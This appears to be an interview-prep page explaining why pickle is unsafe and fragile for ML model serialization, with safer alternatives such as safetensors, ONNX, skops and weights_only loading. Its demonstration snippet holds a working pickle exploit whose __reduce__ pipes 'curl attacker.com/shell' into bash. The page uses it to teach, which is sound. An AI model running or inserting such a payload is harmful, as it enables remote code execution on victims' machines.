datarekha
MLOps Medium Asked at AmazonAsked at GoogleAsked at Hugging Face

What are the security and compatibility risks of using pickle for model serialization, and what are the safer alternatives?

The short answer

Pickle executes arbitrary Python bytecode during deserialization, so loading an untrusted pickle file is equivalent to running arbitrary code on your machine. Beyond security, pickle artifacts are tightly coupled to the exact Python and library versions used to create them, making them fragile across environments.

How to think about it

Python’s pickle module is the default serialization for scikit-learn models, and PyTorch’s torch.save uses it under the hood. Its convenience hides two fundamental problems.

Security: arbitrary code execution

Pickle works by storing Python opcodes that are replayed on load. A malicious actor can craft a pickle file that calls os.system, exfiltrates secrets, or installs a backdoor — all triggered by a single joblib.load("model.pkl"). This is not a theoretical risk; it has been demonstrated repeatedly in ML supply chain attacks.

# Demonstration of the risk — NEVER run untrusted pickles
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)   # executes the command on load

Compatibility: brittle across versions

A pickle created with sklearn 1.3 may fail to load with sklearn 1.5 because internal class paths or attribute names changed. The same pickle created on Python 3.10 can fail on Python 3.12 due to protocol differences.

Safer alternatives by use case:

Use caseFormatTool
Cross-framework inferenceONNXtorch.onnx.export, tf2onnx
Tree models (XGBoost, LightGBM)Native JSON/binarymodel.save_model("model.json")
PyTorch weights onlystate_dict + JSON configtorch.save(model.state_dict(), ...)
Scikit-learn pipelinesskopsskops.io.dump
Hugging Face modelssafetensorsmodel.save_pretrained(...)
# Safer: save PyTorch state dict + separate config
import torch, json

torch.save(model.state_dict(), "weights.pt")
json.dump(model_config, open("config.json", "w"))

# Load: reconstruct architecture first, then load weights
model = MyModel(**json.load(open("config.json")))
model.load_state_dict(torch.load("weights.pt", weights_only=True))

The weights_only=True flag (PyTorch 2.0+) restricts the unpickler to tensor data only, blocking arbitrary code execution.

Keep practising

All MLOps questions

Explore further

Skip to content